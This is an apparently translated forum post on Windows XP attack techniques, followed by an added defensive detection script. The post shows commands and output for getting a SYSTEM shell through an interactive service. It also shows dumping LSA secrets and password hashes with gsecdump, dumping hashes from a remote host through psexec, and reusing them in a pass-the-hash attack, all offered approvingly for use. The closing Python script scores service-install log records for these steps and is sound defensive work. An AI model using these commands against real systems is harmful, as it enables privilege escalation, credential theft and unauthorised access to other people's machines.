To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A hint: you can use iam from the pshtools toolkit to inject the HASH information just captured with gsecdump into the local lsass process, which carries out a hash-injection attack. The foreigners really are good at this; administrators will have their hands full now. The LM/NT hashes obtained during ARP spoofing, or those obtained with gethash, actually never need to be cracked at all; it is purely a matter of using the tool. As the original article puts it well: no matter whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
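A defender-side check for the service-creation step shown at the top of the post, as an added example that is not part of the original post or of the truesecurity.se article: it scores constructed records modelled on Windows System log event 7045 ("a service was installed") and flags services whose image path is an interactive shell rather than a service binary, together with the PSEXESVC service that PsExec installs. The field names and the sample records are assumptions made for illustration.

```python
import re

# Constructed sample records modelled on the fields of Windows System log
# event 7045; these are not real telemetry. The first record mirrors the
# "sc create shellcmdline ... type= interact" command quoted in the post.
SAMPLE_EVENTS = [
    {"ServiceName": "shellcmdline",
     "ImagePath": r"C:\WINDOWS\system32\cmd.exe /K start",
     "ServiceType": "user mode service, interactive",
     "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC",
     "ImagePath": r"C:\WINDOWS\PSEXESVC.exe",
     "ServiceType": "user mode service",
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler",
     "ImagePath": r"C:\WINDOWS\system32\spoolsv.exe",
     "ServiceType": "user mode service",
     "AccountName": "LocalSystem"},
]

# Shells and interpreters that are not legitimate service images on their own.
SHELL_IMAGE = re.compile(
    r"\\(cmd|powershell|wscript|cscript|rundll32)\.exe\b", re.IGNORECASE)


def score_service_event(event):
    """Return the reasons an installed-service record looks suspicious (empty if none)."""
    reasons = []
    path = event.get("ImagePath", "")
    svc_type = event.get("ServiceType", "").lower()
    if SHELL_IMAGE.search(path):
        reasons.append("image path is a shell/interpreter, not a service binary")
    if "interactive" in svc_type and event.get("AccountName") == "LocalSystem":
        reasons.append("interactive service as LocalSystem (console window running as SYSTEM)")
    if event.get("ServiceName", "").upper() == "PSEXESVC":
        reasons.append("PsExec remote-execution service installed")
    return reasons


def triage(events):
    """Map each flagged service name to its reasons; unflagged services are omitted."""
    flagged = {}
    for event in events:
        reasons = score_service_event(event)
        if reasons:
            flagged[event["ServiceName"]] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(f"{name}: " + "; ".join(reasons))
```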